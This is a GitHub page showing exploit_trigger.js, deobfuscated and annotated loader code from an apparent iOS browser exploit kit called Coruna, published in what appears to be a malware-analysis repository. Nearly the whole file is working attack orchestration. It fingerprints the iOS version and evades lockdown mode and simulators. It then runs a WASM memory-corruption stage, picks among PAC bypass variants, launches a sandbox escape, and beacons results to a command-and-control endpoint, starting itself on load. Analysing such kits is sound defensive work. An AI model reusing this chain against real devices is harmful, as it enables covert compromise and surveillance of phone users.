forked from 34306/coruna_analysis
-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathexploit_trigger.js
More file actions
329 lines (301 loc) · 13.1 KB
/
exploit_trigger.js
File metadata and controls
329 lines (301 loc) · 13.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
/**
* Exploit Trigger Module
* =======================
* Contains the main exploit trigger function (fqMaGkNR/triggerExploit) and
* supporting functions that orchestrate the CVE-2024-23222 exploit chain.
*
* Flow:
* 1. Detect platform and iOS version
* 2. Check for lockdown mode (abort if enabled)
* 3. Check for simulator (abort if detected)
* 4. Load appropriate stage1 module based on version/flags
* 5. Execute the WASM primitive exploit (stage1)
* 6. Detect JSC runtime type (PSNMWj vs RoAZdq)
* 7. If PAC-enabled device, load PAC bypass (stage2)
* 8. Load and execute sandbox escape (stage3)
*
* Error codes returned by triggerExploit:
* 0 = success
* 1000 = exploit failed (generic error)
* 1001 = unsupported device/version
* 1003 = simulator detected
*
* Part of the Coruna exploit kit (group.html).
*/
// ============================================================================
// Helper: Report telemetry result to C2
// ============================================================================
/**
* Report exploit status to C2 server
* Original: fqMaGkNr
* @param {number} statusCode - Result code (0=success, 1000=fail, 1001=unsupported, 1003=simulator)
*/
function reportResult(statusCode) {
// fqMaGkN4([]) returns empty string when given empty array
var telemetryPath = ""; // fqMaGkN4([]) = ""
if ("" !== telemetryPath) {
const url = utilityModule.resolveUrl(telemetryPath);
if (url) {
const xhr = new XMLHttpRequest;
const fullUrl = url + "?e=" + statusCode;
xhr.open("GET", fullUrl, true);
xhr.send();
}
}
}
// ============================================================================
// PAC Bypass Loader
// ============================================================================
/**
* Load the appropriate PAC bypass stage based on iOS version flags.
* Selects between different stage2 module variants.
* Original: fqMaGkNO
* @returns {Promise<object>} PAC bypass module with ga() factory method
*/
async function loadPACBypass() {
console.log(`[PAC] Selecting PAC bypass variant...`);
let pacModule;
let useIntlSegmenterBypass = false; // iOS 17+ with Intl.Segmenter PAC bypass
let useAlternateIOS17Path = false; // Alternate iOS 17 path
let useTypeConfusionPAC = false; // iOS 17 with type confusion PAC bypass
let useIOS17LatePath = false; // iOS 17 late versions
let isDefault = false; // Fallback path
const offsets = globalThis.obChTK.hPL3On(
"14669ca3b1519ba2a8f40be287f646d4d7593eb0"
).zn.Nn;
// Select PAC bypass variant based on version-specific flags
if (offsets.wF8NpI) {
useIntlSegmenterBypass = true;
} else if (offsets.LJ1EuL) {
useAlternateIOS17Path = true;
} else if (offsets.CpDW_T) {
useTypeConfusionPAC = true;
} else if (offsets.IqxL92) {
useIOS17LatePath = true;
} else {
isDefault = true;
}
const variant = useIntlSegmenterBypass ? "IntlSegmenter" : useAlternateIOS17Path ? "AltIOS17" : useTypeConfusionPAC ? "TypeConfusion" : useIOS17LatePath ? "iOS17Late" : "Default";
console.log(`[PAC] Selected variant: ${variant}`);
if (useIntlSegmenterBypass) {
// iOS 17.0+ path: Load stage2 pre-requisite, then main stage
await (await globalThis.obChTK.ZKvD0e(
// Hash: "477db22c8e27d5a7bd72ca8e4bc502bdca6d0aba" (stage2 pre-req)
"477db22c8e27d5a7bd72ca8e4bc502bdca6d0aba"
)).ul();
pacModule = await globalThis.obChTK.ZKvD0e(
// Hash: "29b874a9a6cc9fa9d487b31144e130827bf941bb" (stage2 main)
"29b874a9a6cc9fa9d487b31144e130827bf941bb"
);
} else if (useAlternateIOS17Path) {
// Alternate iOS 17 path
await (await globalThis.obChTK.ZKvD0e(
// Hash: "477db22c8e27d5a7bd72ca8e4bc502bdca6d0aba"
"477db22c8e27d5a7bd72ca8e4bc502bdca6d0aba"
)).ul();
pacModule = await globalThis.obChTK.ZKvD0e(
// Hash: "9db8a84aa7caa5665f522873f49293e8eebccd5c"
"9db8a84aa7caa5665f522873f49293e8eebccd5c"
);
} else if (useTypeConfusionPAC) {
pacModule = await globalThis.obChTK.ZKvD0e(
// Hash: "171a7da1934de9e0efb9c1645f4575f88e482873"
"171a7da1934de9e0efb9c1645f4575f88e482873"
);
} else if (useIOS17LatePath) {
pacModule = await globalThis.obChTK.ZKvD0e(
// Hash: "91b278ddb2aec817b10c1535e0963da74f9b8eeb"
"91b278ddb2aec817b10c1535e0963da74f9b8eeb"
);
} else if (isDefault) {
pacModule = await globalThis.obChTK.ZKvD0e(
// Hash: "b586c88246144bc7975ad4e27ec6d62716bf34ea"
"b586c88246144bc7975ad4e27ec6d62716bf34ea"
);
}
if (void 0 === pacModule) throw Error("");
// ga() creates the PAC bypass instance
return pacModule.ga();
}
// ============================================================================
// Main Exploit Trigger
// ============================================================================
/**
* Main exploit trigger function.
* Original: fqMaGkNR
*
* Orchestrates the full exploit chain:
* 1. Platform detection
* 2. Lockdown/simulator checks
* 3. Stage 1 (WASM primitives)
* 4. Runtime detection
* 5. Stage 2 (PAC bypass, if needed)
* 6. Stage 3 (sandbox escape + payload)
*
* @returns {Promise<number>} Status code (0=success, 1000=error, 1001=unsupported, 1003=simulator)
*/
async function triggerExploit() {
const _t0 = performance.now();
console.log(`[LOADER] === Exploit chain starting ===`);
var platform = navigator.platform;
const userAgent = navigator.userAgent;
// Initialize platform detection with:
// - Empty telemetry path
// - Script base URL (decoded from fqMaGkNg)
// - Cookie/session data (from fqMaGkN4 with encoded params)
// - Platform and user agent strings
const platformModule = globalThis.obChTK.hPL3On(
"14669ca3b1519ba2a8f40be287f646d4d7593eb0"
);
console.log(`[LOADER] Platform: ${platform}, UA: ${userAgent.substring(0, 80)}...`);
await platformModule.init(
"", // telemetry string 1 (fqMaGkN4([]) = "")
"./7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.min.js", // script URL
/* session data */ // fqMaGkN4([3436285875, ...]) = cookie/session
undefined, // Array(false)[0] = undefined
undefined, // Array(false)[0] = undefined
platform,
userAgent
);
console.log(`[PLATFORM] iOS version detected: ${platformModule.zn.xn}`);
// Check for lockdown mode — abort if enabled
if (platformModule.On()) { console.error(`[LOADER] ABORT: Lockdown mode enabled`); throw Error(""); }
// Version check: must be >= 130000 (iOS 13.0)
if (130000 > platformModule.zn.xn) { console.error(`[LOADER] ABORT: iOS version too old (${platformModule.zn.xn})`); return 1001; }
// For iOS 16+, check for simulator
if (160000 <= platformModule.zn.xn) {
console.log(`[LOADER] iOS 16+ detected, checking for simulator...`);
try {
await platformModule.Hn(); // detectSimulatorAsync
} catch (e) {
console.error(`[LOADER] ABORT: Simulator check threw`);
return 1001;
}
if (platformModule.zn.Qn) { console.error(`[LOADER] ABORT: Simulator detected`); return 1003; }
}
// Check lockdown mode via IndexedDB Blob test
console.log(`[LOADER] Checking lockdown mode via IndexedDB Blob test...`);
try {
await platformModule.Yn(); // detectLockdownAsync
} catch (e) {
console.error(`[LOADER] ABORT: Lockdown mode check failed`);
return 1001;
}
// ========================================================================
// Stage 1: Load and execute WASM memory primitive exploit
// ========================================================================
let stage1Module;
const offsets = platformModule.zn.Nn;
// Select stage1 variant based on version-specific flags
console.log(`[LOADER] Selecting stage1 variant for offsets: JtEUci=${offsets.JtEUci}, KeCRDQ=${offsets.KeCRDQ}, ShQCsB=${offsets.ShQCsB}, RbKS6p=${offsets.RbKS6p}, mmrZ0r=${offsets.mmrZ0r}`);
if (offsets.JtEUci) {
// Older iOS path
stage1Module = await globalThis.obChTK.ZKvD0e(
"e3b6ba10484875fabaed84076774a54b87752b8a"
);
} else if (offsets.KeCRDQ) {
stage1Module = await globalThis.obChTK.ZKvD0e(
"57cb8c6431c5efe203f5bfa5a1a83f705cb350b8"
);
} else if (offsets.ShQCsB) {
stage1Module = await globalThis.obChTK.ZKvD0e(
"d11d34e4d96a4c0539e441d861c5783db8a1c6e9"
);
} else if (offsets.RbKS6p) {
stage1Module = await globalThis.obChTK.ZKvD0e(
"ea3da0cfb0a5bdb8c440dd4a963f94cbd39d9e44"
);
} else if (offsets.mmrZ0r) {
stage1Module = await globalThis.obChTK.ZKvD0e(
"7d8f5bae97f37aa318bccd652bf0c1dc38fd8396"
);
}
if (void 0 === stage1Module) { console.error(`[LOADER] ABORT: No stage1 module matched`); return 1001; }
console.log(`[LOADER] Stage1 module loaded, executing WASM primitive exploit...`);
// Execute stage1 exploit (builds WASM read/write primitives)
// The `si` property is either an async function or sync function
await (async function executeStage1() {
for (let attempt = 0; attempt < 20; attempt++) {
try {
console.log(`[LOADER] Stage1 attempt ${attempt + 1}/20...`);
if ("AsyncFunction" === stage1Module.si.constructor.name) {
await stage1Module.si();
} else {
stage1Module.si();
}
console.log(`[LOADER] Stage1 succeeded on attempt ${attempt + 1}`);
return;
} catch (e) {
// Retry on failure
}
}
console.error(`[LOADER] Stage1 FAILED after 20 attempts`);
throw Error("");
})();
if (!platformModule.zn.Xn) { console.error(`[LOADER] ABORT: WASM primitives not initialized`); throw Error(""); }
console.log(`[LOADER] Stage1 complete — WASM read/write primitives active`);
// ========================================================================
// Runtime detection + Stage 2 (PAC bypass) + Stage 3 (sandbox escape)
// ========================================================================
platform = 0;
try {
// Detect JSC runtime type (PSNMWj vs RoAZdq) from memory layout
platformModule.lr(); // detectRuntime
console.log(`[RUNTIME] JSC runtime detected: PAC=${platformModule.zn.Sn}`);
// If device has PAC (Pointer Authentication), load PAC bypass
if (platformModule.zn.Sn) {
console.log(`[PAC] Loading PAC bypass (stage2)...`);
platformModule.zn.Mn = await loadPACBypass();
console.log(`[PAC] PAC bypass loaded, checking integrity...`);
platformModule.zn.qn = await platformModule.$n(); // checkPACIntegrity
console.log(`[PAC] PAC integrity check: ${platformModule.zn.qn}`);
}
// Check if wC3yaB flag is set AND PAC integrity check passed
if (true === offsets.wC3yaB && true === platformModule.zn.qn) {
// Load stage3 variant A (with PAC bypass)
console.log(`[STAGE3] Loading sandbox escape variant A (with PAC bypass)...`);
platform = await (await globalThis.obChTK.ZKvD0e(
"7f809f320823063b55f26ba0d29cf197e2e333a8"
)).lA();
} else {
// Load stage3 variant B (without PAC / different approach)
console.log(`[STAGE3] Loading sandbox escape variant B (without PAC)...`);
platform = await (await globalThis.obChTK.ZKvD0e(
"c03c6f666a04dd77cfe56cda4da77a131cbb8f1c"
)).lA();
}
console.log(`[STAGE3] Sandbox escape result: ${platform}`);
} catch (e) {
console.error(`[LOADER] Exploit chain error:`, e);
platform = 1000;
} finally {
// Cleanup exploit primitives
if (platformModule.zn.Xn) {
console.log(`[LOADER] Cleaning up exploit primitives...`);
platformModule.zn.Xn.zr(); // cleanup()
}
}
console.log(`[LOADER] === Exploit chain finished (${(performance.now() - _t0).toFixed(1)}ms) — result: ${platform} ===`);
return platform;
}
// ============================================================================
// Entry Point: Execute exploit with 10ms delay
// ============================================================================
self.setTimeout(async function () {
try {
const result = await triggerExploit();
console.log(`[LOADER] Reporting result: ${result}`);
reportResult(
0 === result ? 0 :
1001 === result ? 1001 :
1000 === result ? 1000 :
1003 === result ? 1003 :
result
);
} catch (e) {
console.error(`[LOADER] Top-level error:`, e);
try {
reportResult(1000);
} catch (e2) {}
}
}, 10);